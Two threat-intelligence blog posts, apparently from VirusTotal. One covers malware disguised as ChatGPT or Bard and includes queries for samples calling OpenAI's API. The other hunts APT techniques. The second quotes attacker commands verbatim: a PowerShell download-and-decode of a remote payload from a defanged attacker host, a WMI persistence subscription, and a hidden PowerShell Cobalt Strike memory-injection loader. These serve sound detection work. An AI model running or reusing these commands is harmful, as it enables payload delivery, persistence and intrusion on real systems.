Wednesday, November 29, 2023

How AI is shaping malware analysis

We just released our “Empowering Defenders: How AI is shaping malware analysis” report, where we want to share VirusTotal’s visibility to help researchers, security practitioners and the general public better understand the nature of malicious attacks, this time focusing on how AI complements traditional malware analysis tools by providing a new functionality, leading to very significant time savings for analysts. Here are some of the main ideas presented:

  • AI offers a different angle on malware detection, from a binary verdict to a detailed explanation.

  • AI excels in identifying malicious scripts, particularly obfuscated ones, achieving up to 70% better detection rates compared to traditional methods alone.

  • AI proved to be a powerful tool for detection and analysis of malicious scripting tool sets traditionally overlooked by security products. 

  • AI demonstrates enhanced detection and identification of scripts exploiting vulnerabilities, with an improvement on exploit identification of up to 300% over traditional tools alone.

  • We observed suspicious samples using AI APIs or leveraging enthusiasm for AI products for distribution. However, AI usage in APT-like attacks cannot be confirmed at this time.



For full details, you can download the report here


The question most asked of VirusTotal since AI became more mainstream is “have you found any AI generated malware”. Detecting if any malware was “AI generated” is a challenging task. How does one trace where any source code comes from? We played with different ideas, trying to find unusual patterns in malware families and actors for the last 12 to 15 months. Through all of our research, we didn’t see any strong indicators. 

In this blog post we provide additional technical details for the AI-generated malware section of our report.


Impersonation Tactics in the Age of AI

As the popularity of certain applications and services grows, cybercriminals capitalize on this trend by impersonating them to infect unsuspecting victims. We observed different campaigns abusing ChatGPT and Google Bard iconography, file name and metadata for distribution. Despite ChatGPT's official launch in November 2022 and Google Bard's in February 2023, it wasn't until early 2023 that distinct patterns and spikes in malware exploiting their reputations emerged, highlighting the evolving tactics of cybercriminals in leveraging popular trends.


Infostealers are the primary type of malware we've observed exploiting the reputations of ChatGPT and Google Bard. Families like Redline, Vidar, Raccoon, and Agent Tesla are among the most prevalent examples we've encountered. In addition, we found an extended list of Remote Access Trojans (RATs) families mimicking these applications, including DCRat, NjRAT, CreStealer, AsyncRAT, Lummac, RevengeRAT, Spymax, Aurora Stealer, Spynote, Warzone and OrcusRAT.

In addition to Windows executables, the second most popular sample type is Android:



As an example of infection vector, we found Redline samples deployed through a .bat file distributed inside a .zip bundling a document called "GPT CHAT INSTALLATION INSTRUCTIONS.docx":



Another distribution vector is through the use of ISO images. We found a Vidar sample distributed through "ChatGPT For Dummies 2st Edition.iso".

Other interesting findings include a Bumblebee sample distributed as “ChatGPT_Setup.msi”, or a sample (“ChatGPT_0.12.0_windows_x86_64.exe”) using drivers to probably escalate privileges. “ChatGPT Complete Guide For Developers Students And Worrkers 2023.exe” uses Process Explorer drivers to elevate privileges during execution as well.

Although the most popular infection vector for the samples analyzed are other samples (like droppers or compressed files), we found some of them distributed through legitimate websites, hosting services and web applications, and Discord. We believe the latter is on the verge of discontinuation, as they've recently announced a shift in their Content Delivery Network (CDN) approach.

Additionally, we searched for samples communicating with platforms hosting AI models based on the findings of the following Kaspersky's blog post, where a sample downloads a potential malicious model from huggingface.co. You can find the following query to find suspicious samples communicating with this domain.

Suspicious samples using OpenAI’s API


The number of suspicious samples interacting in some way with api.openai.com shows a slow growing trend, with a peak in August 2023.


To search for files that contact or contain the OpenAI API endpoint you can use the following query:

entity:file p:5+ (embedded_domain:api.openai.com or behaviour_network:api.openai.com)

Another option could be searching for common patterns when using the OpenAI API:

entity:file p:5+ (content:code-davinci or content:text-davinci or content: api.openai.com)


A third option is getting files related to the URL api.openai.com, which includes files that reference this domain and communicating files.


This can be automated to easily discriminate samples based on different criteria, such as detection rate, using VT-PY or VirusTotal’s API. Let’s see an example.

The following code uses the API to get a list of entities communicating with api.openai.com, including referring files:

malware_AI_objects = []
async for mai in cli.iterator(
  '/intelligence/search',
  params={
         'query': 'https://api.openai.com',
            'attributes': (''),
            'relationships': ('referrer_files')},
        limit=0):
 malware_AI_objects.append(mai.to_dict())

We can iterate over the previous query to obtain the list of all related files. The 'malware_AI_objects' variable contains the URLs to get additional details on them:


The following code iterates the previous list of URLs obtaining additional details in the 'last_analysis_stats' field to filter out malicious files.

malware_AI_df = pd.DataFrame(
   [{'domain': mai['id'], **mai['relationships']}
    for mai in malware_AI_objects
    if mai['relationships']['referrer_files']['data']])
malware_AI_hashes = []
async for mai in cli.iterator('/urls/9b1b5eabf33c765585b7f7095d3cd726d73db49f3559376f426935bbd4a22d4b/referrer_files',
               params={'attributes': ('sha256,last_analysis_stats')},limit=0):
 malware_AI_hashes.append(mai.to_dict())

Finally, we can filter out results based on the number of AV detections provided in the “malicious” field.

malware_AI_hashes_DF = pd.DataFrame(
 [{'sha256': mai['id']}
   for mai in malware_AI_hashes
   if mai['attributes']['last_analysis_stats']['malicious'] > 1 ]
)

We can easily modify this script to obtain the files ('Communicating Files') that interact with the 'api.openai.com' domain.


RAT in the chat

As previously mentioned, we found several RAT samples mimicking AI applications (Google Bard, OpenAI Chat-GPT).  Some DarkComet samples use 'https://api.openai.com/v1/completions', which according to OpenAI’s documentation, can be used to prompt Chat-GPT. This endpoint requires an API key.

One of these samples, with 42 AV detections, included this URL although it did not connect to openai.com during sandbox execution, so we took a deeper look.

The first disassembled instructions show the 'krnln.fnr' string and the registry entry "Software\FlySky\E\Install", that refers to EPL (Easy Programming Language). EPL provides functionality similar to Visual Basic. This blog post (@Hexacorn) provides more information on how to analyze these files.

If this framework is installed on the victim's computer, the sample opens a window for the victim to interact with Chat-GPT with a  'How are you?' in Chinese.


This file appears in the resource segment of another PE file. This parent file is a RAT that
executes the previous chatbot.



Wrapping it up


The integration of AI engines into VirusTotal has provided a unique opportunity to evaluate their capabilities in real-world scenarios. While the field is still rapidly evolving, AI engines have demonstrated remarkable potential for automating and enhancing various analysis tasks, particularly those that are time-consuming and challenging, such as deobfuscation and interpreting suspicious behavior.

Pinpointing whether malware is AI-generated remains a complex task due to the difficulty of tracing the origins of source code. Instead, we've encountered malware families employing AI themes for distribution, exploiting the current trend of AI-based threats. This opportunistic behavior is unsurprising, given attackers' tendency to capitalize on trending topics. The majority of these disguised samples are trojans targeting Windows systems, followed by Android samples. 

While the integration of OpenAI APIs into certain RATs has been observed, the specific purpose and effectiveness of this integration remain unclear. It appears that RAT operators may be utilizing OpenAI APIs as a distraction tactic rather than leveraging their full potential for advanced malicious activities. Nonetheless, it is imperative to maintain vigilance and closely monitor how the usage of OpenAI APIs in RATs might evolve in the future.

As always, we would like to hear from you.


Happy hunting!

Thursday, November 23, 2023

, , , ,

Actionable Threat Intel (VI) - A day in a Threat Hunter's life

Kaspersky's CTI analysts recently released their Asian APT groups report, including details on behavior by different adversaries. Following our series on making third-party intelligence actionable using VirusTotal Intelligence, we have put on our threat hunter’s hat to find samples and monitor activity based on the report’s details.
Many of the behaviors shared by Kaspersky are based on the use of LOLBAS by attackers once the set foothold on the victim. This is an increasing trend by adversaries, which makes it critical for security analysts to understand these binaries’ capabilities.
Let’s start by analyzing the most interesting bits we found in the report.

Start-BitsTransfer

Start-BitsTransfer is a cmdlet that supports the download of multiple files, which seems to be an alternative for adversaries to the most commonly used bitsadmin.exe binary. The report describes its use in different cases, here we can find one example:
PowerShell "Start-BitsTransfer -Source hxxp://security.lomiasecure[.]net/crx/node.txt -Destination C:\\Users\\public\\node.txt -transfertype download" PowerShell if($InputString = Get-Content 'C:\\users\\public\\node.txt'){ [System.IO.File]::WriteAllBytes('C:\\users\\public\\node.exe', [System.Convert]::FromBase64String($InputString))}
The example uses FromBase64String and WriteAllBytes, so our query will look for either of them using an OR condition, as well as for the presence of the "Start-BitsTransfer" cmdlet in sandbox’s behavior. The following VT intelligence query obtains samples with similar (not identical) behaviors.
behavior_processes:"Start-BitsTransfer -Source" (behavior_processes:"[System.Convert]::FromBase64String" or behavior_processes:"[System.IO.File]::WriteAllBytes")
The query returns 12 suspicious samples. Activity seems to be clustered around October and November 2023. Some of the results are related, according to OSINT, to APT33 and The Gorgon Group:

WMI Event Subscription

This technique is used by threat actors during lateral movement mainly for execution and persistence. To achieve this the WMI event subscription points to the payload to execute.
instance of __EventFilter { EventNamespace = "root\\cimv2"; Name = "Chrome Update"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=240 AND TargetInstance.SystemUpTime < 325"; QueryLanguage = "WQL"; };
instance of CommandLineEventConsumer { ExecutablePath = "C:\\Windows\\System32\\GoogleUpdate.exe"; Name = "GoogleUpdater"; };
There are different ways to search in VirusTotal for samples with this behavior. In this case, we identified the use of "ExecutablePath" instead of "CommandLineTemplate" to specify the path to the payload, which is the more common method. When “CommandLineTemplate” is null, the value of “ExecutablePath” is used instead. Then the process is executed by calling the “CreateProcess” API. The following VTI query is based on this finding:
(behavior:"EventNamespace =") (behavior:"Name =") behavior:"QueryLanguage = \"WQL\"" (behavior:"__EventFilter" behavior:"CommandLineEventConsumer") behavior:"ExecutablePath ="
This query returns 41 results, including Konni malware samples and samples attributed to APT37. As a confirmation to our previous assumption, using “CommandLineTemplate =” instead of “ExecutablePath =” returns 1.1k samples.
Please note the use of "behavior" instead of "behavior_processes" in the previous VTI query. The reason is WMI statements are commonly stored in the "Dataset actions", "Highlighted Text" and "Calls Highlighted" sections under the sample’s behavior. This is because WMI events do not launch new processes, as they are processed by a ETW provider, resulting in these events being mapped under “behavior” by the sandbox. Here you can find an example.
Another interesting way to hunt and monitor samples using this technique is through the following crowdsourced sigma rule, which checks for WMI event subscriptions.
sigma_rule:07b95c7eb376ac65a345dc6a2c1cb03732e085818d93bd1ea2e7d3706619d78e

PowerShell capabilities

Not surprisingly, PowerShell is one of the most used scripting languages by attackers. In particular, the following code injects Cobalt Strike in binary form into memory.
ะก:\Windows\system32\cmd.exe /b /c start /b /min PowerShell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+ '\sysnative\WindowsPowerShell\v1.0\PowerShell.exe'}else{$b='PowerShell.exe'};$s=NewObject System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System. Convert]::FromBase64String(''H4sIAIKCBWACA7VWa2+ bSBT9nEj5D6iyZFAcP5I0bSJVWsY2McR2jYlxbK+1IjDA1MMjMDgm3f73vYMhTbdp.... '))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))'; $s.UseShellExecute=$false;$s.RedirectStandardOutput=$true; $s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
From the previous PowerShell, it is possible to create a query to detect patterns using the same memory injection technique. The resulting samples seem to mostly use it to inject Metasploit.
behavior_processes:"{$b='PowerShell.exe'}" behavior_processes:"-nop -w hidden -noni -c" behavior_processes:"{$b=$env:windir+"
From the previous query, half of the results correspond to metasploit samples, mainly “.bat” scripts that aim to execute “cmd.exe” to launch PowerShell, and finally, load in memory the payload in binary form.
41 out of 44 results are identified by the same sigma rule “Powershell Decrypt And Execute Base64 Data”, created by Joe Security. We can search additional identified samples by this crowdsourced rule with the VTI following query.
sigma_rule:d77da6b7c1a6f6530b4eb82ca84407ff02947b235ab29c94eade944c4f51e499

Automate your queries ๐Ÿš€

The previous are simple examples on how a CTI team could consume tactical intelligence for hunting. Once assessed the efficacy of the VTI queries, it's time to convert them into VT Livehunt rules to automatically monitor any suspicious future activity. VTI queries can be easily translated into YARA rules, used by Livehunt, thanks to the “vt” module. Let’s see how.
Start-BitsTransfer
The Livehunt YARA rule resulting from our previous VTI query will automatically monitor and notify us with any new samples using the Start-BitsTransfer cmdlet technique previously discussed. This is usually used either through a script or directly on the command line interpreter.
In our YARA, we use different fields like “terminated processes”, “executed commands” or “created processes” to look for the use of “Star-BitsTransfer”. Then we search in processes created, terminated and command executions for traces of the “FromBase64” and “System.IO.File” strings, also needed for this technique. Finally, we added the “new file” modifier at the beginning to receive notifications only for fresh new uploads.
๐Ÿš€ Check out the rule on our GitHub
WMI Event Subscription
For this rule, we split the condition into two blocks. The first one searches for the patterns we used in our VTI query in “processes created”, “terminated” and “commands executed” during detonation. The second block searches for the same strings in a different set of fields, in this case “highlighted calls”, “highlighted text”, and “system property lookups” given WMI execution is also (although, more rarely) stored in these fields, as previously discussed.
๐Ÿš€ Check out the rule on our GitHub
PowerShell capabilities
This rule, as the previous ones, searches for patterns in “processes created”, “terminated” and “commands executed”. In addition to that, it also searches telemetry generated by sigma rule matches, which is a powerful feature often overlooked. In this case, it will search for Windows XML EventLog EVTX events generated by our sandboxes containing the same pattern we searched for in “behavior”.
๐Ÿš€ Check out the rule on our GitHub

Wrapping up

VT Intelligence queries based on third-party intelligence publications is one of the most usual tasks for CTI teams, allowing a better understanding and calibration of the malicious campaign, threat hunting and monitoring. Queries based on TTPs could be easily generated thanks to all the details resulting from VirusTotal’s sandbox detonation. Once the query is polished and we are happy with the results, it can quickly be converted into a YARA livehunt rule to automate the identification of new samples and monitor the evolution of the given campaign.
The process illustrated in this blog can be used by any CTI, Threat Hunting, and even Detection Engineering teams, leveraging external low-level tactical information for hunting, better understanding of the campaigns and malware leveraged, threat actor identification, estimate amount of samples, detection and timeline, monitor any campaign’s evolution, extract IOCs for proactive protection and develop rules for internal detection.
As usual, we are happy to hear from you!
Happy hunting!